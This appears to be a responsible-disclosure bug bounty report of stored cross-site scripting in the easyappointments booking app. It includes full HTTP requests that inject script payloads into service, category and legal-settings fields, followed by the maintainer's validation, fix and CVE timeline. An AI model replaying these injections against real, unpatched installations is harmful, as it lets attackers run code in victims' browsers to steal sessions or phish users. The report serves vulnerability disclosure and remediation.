Multiple XSS in Create/Update Funtion Version 1.4.3 and 1.5.0-dev.2 in alextselegidis/easyappointments

Valid

Reported on

Mar 28th 2023

Description

Stored XSS on create/update service, categories, settings. I was test on 1.4.3 (demo site) and 1.5.0-dev2

Proof of Concept

Install
I install from develope branch. When finish install footer display version v1.5.0-dev.2
The time I run and commit below on image is the latest
lastest-commmit.png
webUI
version-2.png
alert on demo site: Version 1.4.3

alert-1-4-1.png Reproduce on Local
Request:

POST /easyappointments/index.php/services/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 482
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/services
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=u4ub9lhann4css234pgt235217t2gfqb; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&service%5Bname%5D=Service%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Bduration%5D=30&service%5Bprice%5D=0&service%5Bcurrency%5D=&service%5Bdescription%5D=1%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Blocation%5D=&service%5Bcolor%5D=%23ebe07c&service%5Bavailabilities_type%5D=flexible&service%5Battendants_number%5D=1&service%5Bis_private%5D=0&service%5Bid%5D=1

Response:

{"success":true,"id":1}

Request:

POST /easyappointments/index.php/services/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 448
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/services
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=u4ub9lhann4css234pgt235217t2gfqb; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&service%5Bname%5D=S2%22%3E%3Cscript%3Ealert(String.fromCharCode(88))%3C%2Fscript%3E&service%5Bduration%5D=30&service%5Bprice%5D=0&service%5Bcurrency%5D=&service%5Bdescription%5D=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Blocation%5D=&service%5Bcolor%5D=%237cbae8&service%5Bavailabilities_type%5D=flexible&service%5Battendants_number%5D=1&service%5Bis_private%5D=0

Response:

{"success":true,"id":3}

Request

POST /easyappointments/index.php/categories/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 214
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/categories
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=nfn5oc2bm60pr5lkaede42b97rgiag83; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&category%5Bname%5D=categories%22%3E%3Cscript%3Ealert('categories')%3C%2Fscript%3E&category%5Bdescription%5D=categories%22%3E%3Cscript%3Ealert('categories')%3C%2Fscript%3E

Response

{"success":true,"id":3}

Request

POST /easyappointments/index.php/categories/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/categories
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=nfn5oc2bm60pr5lkaede42b97rgiag83; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&category%5Bname%5D=categories%22%3E%3Cscript%3Ealert('categories2')%3C%2Fscript%3E&category%5Bdescription%5D=categories%22%3E%3Cscript%3Ealert('categories2')%3C%2Fscript%3E&category%5Bid%5D=2

Ressponse

{"success":true,"id":2}

Request

POST /easyappointments/index.php/legal_settings/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 711
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/legal_settings
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=96k2nk94s2cihcbevlmanv2mf76c84mk; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&legal_settings%5B0%5D%5Bname%5D=display_cookie_notice&legal_settings%5B0%5D%5Bvalue%5D=0&legal_settings%5B1%5D%5Bname%5D=cookie_notice_content&legal_settings%5B1%5D%5Bvalue%5D=1%22%3E%3Cscript%3Ealert('abc')%3C%2Fscript%3E&legal_settings%5B2%5D%5Bname%5D=display_terms_and_conditions&legal_settings%5B2%5D%5Bvalue%5D=0&legal_settings%5B3%5D%5Bname%5D=terms_and_conditions_content&legal_settings%5B3%5D%5Bvalue%5D=Terms+and+conditions+content.&legal_settings%5B4%5D%5Bname%5D=display_privacy_policy&legal_settings%5B4%5D%5Bvalue%5D=1&legal_settings%5B5%5D%5Bname%5D=privacy_policy_content&legal_settings%5B5%5D%5Bvalue%5D=1%22%3E%3Cscript%3Ealert('abc')%3C%2Fscript%3E

Alert
open bookng link or index to view alert
alert-index.png
booking-link.png
alert-1.png
alert-2.png
Alert with setting
alert-3.png

Impact

An XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.

We are processing your report and will contact the alextselegidis/easyappointments team within 24 hours. 2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
We have contacted a member of the alextselegidis/easyappointments team and are waiting to hear back 2 months ago
Alex Tselegidis validated this vulnerability a month ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Alex Tselegidis marked this as fixed in 1.5.0 with commit 46a865 a month ago
Alex Tselegidis has been awarded the fix bounty
This vulnerability has been assigned a CVE
Alex Tselegidis published this vulnerability a month ago
Legal_settings.php#L75-L105 has been validated
Categories.php#L112-L180 has been validated
Services.php#L113-L207 has been validated
to join this conversation